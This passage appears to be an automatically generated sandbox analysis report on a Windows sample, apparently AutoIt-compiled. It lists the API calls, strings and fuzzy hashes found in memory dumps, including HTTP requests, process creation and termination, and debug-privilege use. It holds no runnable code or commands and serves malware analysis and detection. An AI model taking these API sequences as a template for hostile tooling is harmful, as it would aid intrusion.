                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 1924731296-2107944366
                                                                        • Opcode ID: 61a4150af2aa0dd53f8afa7d3cb2fd969869f008e89feddf0b87f104a5e2f973
                                                                        • Instruction ID: 4a79a86c41703e43f4c78ee8f5164c21c520844e0a49eb894d4e7164e2064dc3
                                                                        • Opcode Fuzzy Hash: 61a4150af2aa0dd53f8afa7d3cb2fd969869f008e89feddf0b87f104a5e2f973
                                                                        • Instruction Fuzzy Hash: 0251BA31118304AFD714EF24CC9AFAA37F8FB88714F500A1DF985962E2DB709A08CB52
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009445FF
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0094462B
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0094466D
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00944682
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0094468F
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009446BF
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00944706
                                                                          • Part of subcall function 00945052: GetLastError.KERNEL32(?,?,009443CC,00000000,00000000,00000001), ref: 00945067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1241431887-3916222277
                                                                        • Opcode ID: 53a66821a40798cc97974fc64322116e9904da9e6df63be024d5c29f551b332e
                                                                        • Instruction ID: 3daae2d40e34ae62aa62f872146cca498f91f75fcc866be75ba6964c0f0c2c8c
                                                                        • Opcode Fuzzy Hash: 53a66821a40798cc97974fc64322116e9904da9e6df63be024d5c29f551b332e
                                                                        • Instruction Fuzzy Hash: D7419EB2501208BFEB059F50CC89FBF77ACFF49354F014026FA059A141D7B09E449BA4
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0098DC00), ref: 0094B715
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0098DC00), ref: 0094B749
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0094B8C1
                                                                        • SysFreeString.OLEAUT32(?), ref: 0094B8EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: 8d7f46712ae05e3c9ad7997b0c9d7ffd65e6afb307a2f0e633b125a02713d90f
                                                                        • Instruction ID: 79a9fe72b72b64516e084417d190dbefe0c2d708e0b63f7a021fce8a85c12c19
                                                                        • Opcode Fuzzy Hash: 8d7f46712ae05e3c9ad7997b0c9d7ffd65e6afb307a2f0e633b125a02713d90f
                                                                        • Instruction Fuzzy Hash: BAF10875A00209AFCF14DFA4C884EAEB7B9FF89315F148459F915AB250DB31EE46CB90
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009524F5
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00952688
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009526AC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009526EC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095270E
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095286F
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009528A1
                                                                        • CloseHandle.KERNEL32(?), ref: 009528D0
                                                                        • CloseHandle.KERNEL32(?), ref: 00952947
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: 228ed597e6a2f2c610b8c0334f40b5e1971fb830fbc9f48ddf7aca3d92ec4a5e
                                                                        • Instruction ID: 4cae94a01905515d3bf7d3f002dab5e700421cee06dfdecdab563a6ae2dc698c
                                                                        • Opcode Fuzzy Hash: 228ed597e6a2f2c610b8c0334f40b5e1971fb830fbc9f48ddf7aca3d92ec4a5e
                                                                        • Instruction Fuzzy Hash: C0D1AC31604200DFCB14EF25C891B6ABBE5BF85314F18895DF9899B3A2DB31ED45CB92
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0095B3F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 31169b590b4b79072ccdae5c940685a946424f26193c633b32ae6cb2b8970f2b
                                                                        • Instruction ID: bcfa5737e99e2572c4ab78e2e394c5ed44e9dd5c97f6924fa4b8e7ea8e6821a1
                                                                        • Opcode Fuzzy Hash: 31169b590b4b79072ccdae5c940685a946424f26193c633b32ae6cb2b8970f2b
                                                                        • Instruction Fuzzy Hash: 6051AD31602204BFEF34DF2ACC85BAD7B68AB05326F644511FE14E62E2D775E9889B50
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0096DB1B
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096DB3C
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0096DB51
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0096DB6E
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0096DB95
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0090A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0096DBA0
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0096DBBD
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0090A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0096DBC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1268354404-0
                                                                        • Opcode ID: acd167f19eb00be58aab94cb3a92ff14626ec7030724e0618879f99637ed6523
                                                                        • Instruction ID: 28b32132f4e0fb156e836a5c5427cfb24c1cd11df55e6887f95a5453aa7cb68b
                                                                        • Opcode Fuzzy Hash: acd167f19eb00be58aab94cb3a92ff14626ec7030724e0618879f99637ed6523
                                                                        • Instruction Fuzzy Hash: 83517771A15308EFDB20DF68CC91FAA77B8AF48360F104619F916962D0D7B0AD80EB90
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00935FA6,?), ref: 00936EF1
                                                                          • Part of subcall function 009372CB: GetFileAttributesW.KERNEL32(?,00936019), ref: 009372CC
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 009375CA
                                                                        • _wcscmp.LIBCMT ref: 009375E2
                                                                        • MoveFileW.KERNEL32(?,?), ref: 009375FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: 9b807cb42c39763c0c8b07715cbce855aa32bb2a8d1df30086467af6cfba81dd
                                                                        • Instruction ID: 775baa8638515a61a4f5d5d4e159d2af3c330343ca678d9724c7d72aa0ea6f04
                                                                        • Opcode Fuzzy Hash: 9b807cb42c39763c0c8b07715cbce855aa32bb2a8d1df30086467af6cfba81dd
                                                                        • Instruction Fuzzy Hash: D35112F2A0921D5ADF64EB94D841ADEB3BC9F4C310F00449AF605E3141EA7496C5CF60
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0090EAEB
                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0090EB32
                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0096DC86
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0096DCF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: ba31b37780f6933e42823ab75ac871064b4d0ca0d498c6959bd5245c5a24e942
                                                                        • Instruction ID: 5f76ebfe51a7d1290707404c9dee4df896b7f53766e5b170e189e64e377ea8ea
                                                                        • Opcode Fuzzy Hash: ba31b37780f6933e42823ab75ac871064b4d0ca0d498c6959bd5245c5a24e942
                                                                        • Instruction Fuzzy Hash: 6141167171A280DFDB394B2A8D8DB3A7A9EAF45314F590C0DF09B825E1C678BC80E711
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0092B26C
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092B273
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0092B288
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 0092B290
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 0092B293
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 0092B2A3
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 0092B2AB
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 0092B2AE
                                                                        • CreateThread.KERNEL32(00000000,00000000,0092B2D4,00000000,00000000,00000000), ref: 0092B2C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 3d3fa9de3d47987863a9e5ff4352ff45013c69f65e2b54792ad8329df0b28bd4
                                                                        • Instruction ID: 4f9f426008a739b95d12cc9888b36e0eeda30cf7e46b6d1336d4d1a3ecf25a00
                                                                        • Opcode Fuzzy Hash: 3d3fa9de3d47987863a9e5ff4352ff45013c69f65e2b54792ad8329df0b28bd4
                                                                        • Instruction Fuzzy Hash: 4301F6B2255308BFEB10ABA5DC49F6B3BACEF88704F008411FA08CB1A1CA709840DB21
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: febf491e58175608bb7d06b76783e46c97312ebacfe3752453719cfe3d0d1bea
                                                                        • Instruction ID: eab6b58c5ba43cfec376219e2e51381ceac74e342b314602222ac9ff40ff864f
                                                                        • Opcode Fuzzy Hash: febf491e58175608bb7d06b76783e46c97312ebacfe3752453719cfe3d0d1bea
                                                                        • Instruction Fuzzy Hash: C0E1C3B1A0121AAFDF54DFA8D881FAE77B9EF48314F148429F905AB281D770AD41CF90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: ee7e6a1027c7503d6545a070b06f57e15aeb857852039ed81668c142e69ce9d6
                                                                        • Instruction ID: 67f2df726d9bf5a0344bc10270fc892ee99e1a5e876f9c964b8fd17604927176
                                                                        • Opcode Fuzzy Hash: ee7e6a1027c7503d6545a070b06f57e15aeb857852039ed81668c142e69ce9d6
                                                                        • Instruction Fuzzy Hash: 51917B71E00219ABDB24CFA5C888FAEBBB8EF85715F108559F515AB280DB70D944CFA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00959B19
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00959B2D
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00959B47
                                                                        • _wcscat.LIBCMT ref: 00959BA2
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00959BB9
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00959BE7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: e0404b02e24f333426965959f6f9b0e44ec011f8591735813c7b23f76c77328e
                                                                        • Instruction ID: 765872b08dfa89f5616875fbb26645dba05f777dc6ba22e0d48fc08d7880d2d1
                                                                        • Opcode Fuzzy Hash: e0404b02e24f333426965959f6f9b0e44ec011f8591735813c7b23f76c77328e
                                                                        • Instruction Fuzzy Hash: AE419171A00308EBEB21DF64DC85BEE77BDEF48351F10442AF989A7291D6759D88CB60
                                                                        APIs
                                                                          • Part of subcall function 00936532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00936554
                                                                          • Part of subcall function 00936532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00936564
                                                                          • Part of subcall function 00936532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009365F9
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095179A
                                                                        • GetLastError.KERNEL32 ref: 009517AD
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009517D9
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00951855
                                                                        • GetLastError.KERNEL32(00000000), ref: 00951860
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00951895
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: f923f1239488b75bc74338f88557befa711bba487fa99c94336335a1d2c480a7
                                                                        • Instruction ID: e5d55e39ed322e528e32e623402f5155a09ddbb8064361b949442970287e64c9
                                                                        • Opcode Fuzzy Hash: f923f1239488b75bc74338f88557befa711bba487fa99c94336335a1d2c480a7
                                                                        • Instruction Fuzzy Hash: C141B072600200AFDB15EF69C895F6EB7B5AF84311F048458FA069F3D2DB759948CF91
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 009358B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: da1fc06965db3e288804ebf786690d673bcdb7fbe4d3b05175f9db516b28617e
                                                                        • Instruction ID: ee6fe201b09dc4c4693ad19c9e7665e623e6113561419ec40e8c8c27472c8f3f
                                                                        • Opcode Fuzzy Hash: da1fc06965db3e288804ebf786690d673bcdb7fbe4d3b05175f9db516b28617e
                                                                        • Instruction Fuzzy Hash: 3E110D3670D746FBE7055B549C83DAA63ECAF99314F21003AF501E5381E7A5AA814AA4
                                                                        APIs
                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0093A806
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafeVartype
                                                                        • String ID:
                                                                        • API String ID: 1725837607-0
                                                                        • Opcode ID: b35179455ca4bfc64272badb98f6f078e687a21a95fbf94be4d8a9bc6c24860b
                                                                        • Instruction ID: dd2b93b46b0b4d3e2595f29900ef0bbe1948b6a2b39bbe4fa99479f8f3a712c6
                                                                        • Opcode Fuzzy Hash: b35179455ca4bfc64272badb98f6f078e687a21a95fbf94be4d8a9bc6c24860b
                                                                        • Instruction Fuzzy Hash: E8C1B076A0421ADFDB10CF98C485BAEB7F5FF08311F204469E686E7291D735AA41CF91
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00936B63
                                                                        • LoadStringW.USER32(00000000), ref: 00936B6A
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00936B80
                                                                        • LoadStringW.USER32(00000000), ref: 00936B87
                                                                        • _wprintf.LIBCMT ref: 00936BAD
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00936BCB
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00936BA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: 15d23022dbf2f103c776b3d048bbff258f6c33caba0cd93d3659e50ff6358a5d
                                                                        • Instruction ID: 40debb35467b1037ac8ad0c782c7e2a2ea7e9eaaf72e3c97121115a4eb9ef97b
                                                                        • Opcode Fuzzy Hash: 15d23022dbf2f103c776b3d048bbff258f6c33caba0cd93d3659e50ff6358a5d
                                                                        • Instruction Fuzzy Hash: 7B0112F75042087FEB11AB949D89EE6777CDB04704F4044A1B749E6141EA749EC49F70
                                                                        APIs
